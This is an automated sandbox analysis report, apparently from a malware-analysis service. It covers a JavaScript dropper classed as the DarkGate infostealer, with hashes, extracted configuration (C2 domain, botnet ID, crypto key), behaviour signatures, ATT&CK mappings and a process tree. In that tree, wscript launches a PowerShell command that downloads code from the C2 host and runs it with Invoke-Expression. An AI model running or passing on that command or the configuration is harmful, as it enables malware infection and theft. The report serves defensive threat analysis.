Analysis

  • max time kernel
    141s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231020-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-11-2023 17:38

General

  • Target

    NEAS.c788100411c38388afc3438dccc05297ac7a77083f579e4a7e8d6e1479214fde.js

  • Size

    237KB

  • MD5

    ea6fd6ca47514d9c632c119d73aef528

  • SHA1

    0d47cbd6d19a17a57077cbc0d0aa659865458672

  • SHA256

    c788100411c38388afc3438dccc05297ac7a77083f579e4a7e8d6e1479214fde

  • SHA512

    e20079b69e82eb48222635ef03a6f935871ea69f6d7715401ac208bbbb33a5af7fcb8c6c745364b31c2ee07e3f4bf2e5e5c2d1ae6ae87b795fa23230ead290ec

  • SSDEEP

    6144:k7hgXeerjqlI2Iro+Qqn7hgXeerjqlI2Iro+JGxw:ehgSlI23W7hgSlI23Ct

Score
10/10

Malware Config

Extracted

Family

darkgate

Botnet

A11111

C2

http://faststroygo.com

Attributes
  • alternative_c2_port

    8080

  • anti_analysis

    false

  • anti_debug

    false

  • anti_vm

    false

  • c2_port

    80

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_rawstub

    true

  • crypto_key

    sYEvPOjQglaHah

  • internal_mutex

    txtMut

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    4

  • rootkit

    true

  • startup_persistence

    true

  • username

    A11111

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
      PID:796
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        2⤵
          PID:3980
        • C:\Windows\system32\backgroundTaskHost.exe
          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX53ypgrj20bgndg05hj3tc7z654myszwp.mca
          2⤵
            PID:4412
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            2⤵
              PID:3560
          • C:\Windows\system32\wscript.exe
            wscript.exe C:\Users\Admin\AppData\Local\Temp\NEAS.c788100411c38388afc3438dccc05297ac7a77083f579e4a7e8d6e1479214fde.js
            1⤵
            • Blocklisted process makes network request
            • Checks computer location settings
            • Modifies system certificate store
            • Suspicious use of WriteProcessMemory
            PID:1396
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri "http://faststroygo.com:80/jsslatecqpa");
              2⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3912
              • C:\tepp\AutoIt3.exe
                "C:\tepp\AutoIt3.exe" latecqpa.au3
                3⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Executes dropped EXE
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                PID:3848
          • C:\Windows\servicing\TrustedInstaller.exe
            C:\Windows\servicing\TrustedInstaller.exe
            1⤵
              PID:3344

            Network

            MITRE ATT&CK Matrix ATT&CK v13

            Defense Evasion

            Subvert Trust Controls

            1
            T1553

            Install Root Certificate

            1
            T1553.004

            Modify Registry

            1
            T1112

            Discovery

            Query Registry

            2
            T1012

            System Information Discovery

            3
            T1082

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g5hpo2mx.k2u.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\tepp\AutoIt3.exe
              Filesize

              872KB

              MD5

              c56b5f0201a3b3de53e561fe76912bfd

              SHA1

              2a4062e10a5de813f5688221dbeb3f3ff33eb417

              SHA256

              237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

              SHA512

              195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

            • C:\tepp\AutoIt3.exe
              Filesize

              872KB

              MD5

              c56b5f0201a3b3de53e561fe76912bfd

              SHA1

              2a4062e10a5de813f5688221dbeb3f3ff33eb417

              SHA256

              237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

              SHA512

              195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

            • C:\tepp\AutoIt3.exe
              Filesize

              872KB

              MD5

              c56b5f0201a3b3de53e561fe76912bfd

              SHA1

              2a4062e10a5de813f5688221dbeb3f3ff33eb417

              SHA256

              237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

              SHA512

              195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

            • C:\tepp\latecqpa.au3
              Filesize

              491KB

              MD5

              6696048e8c881d11d34693e7bd489914

              SHA1

              006775ec7d52759c9332fca82511f2393cca91a0

              SHA256

              c38255b259f5e552c33142d192afd438f824773dfcea4eb31c707ce86949464c

              SHA512

              5950ee2237918933c3b139161430f22952cf049e75c68cde7b8a94b708aba643d87b5e20cc156ae1cef9febf1b20d3e9dc4bf0360eccb413030dd2f1e0e1358a

            • memory/3848-40-0x00000000049C0000-0x0000000004B55000-memory.dmp
              Filesize

              1.6MB

            • memory/3848-39-0x0000000001850000-0x0000000001C50000-memory.dmp
              Filesize

              4.0MB

            • memory/3848-47-0x00000000049C0000-0x0000000004B55000-memory.dmp
              Filesize

              1.6MB

            • memory/3848-48-0x00000000049C0000-0x0000000004B55000-memory.dmp
              Filesize

              1.6MB

            • memory/3848-49-0x00000000049C0000-0x0000000004B55000-memory.dmp
              Filesize

              1.6MB

            • memory/3912-22-0x0000022F4FBF0000-0x0000022F4FDB2000-memory.dmp
              Filesize

              1.8MB

            • memory/3912-20-0x0000022F351A0000-0x0000022F351B0000-memory.dmp
              Filesize

              64KB

            • memory/3912-21-0x0000022F351A0000-0x0000022F351B0000-memory.dmp
              Filesize

              64KB

            • memory/3912-36-0x00007FFB9B7A0000-0x00007FFB9C261000-memory.dmp
              Filesize

              10.8MB

            • memory/3912-19-0x0000022F351A0000-0x0000022F351B0000-memory.dmp
              Filesize

              64KB

            • memory/3912-18-0x00007FFB9B7A0000-0x00007FFB9C261000-memory.dmp
              Filesize

              10.8MB

            • memory/3912-13-0x0000022F4F4C0000-0x0000022F4F4E2000-memory.dmp
              Filesize

              136KB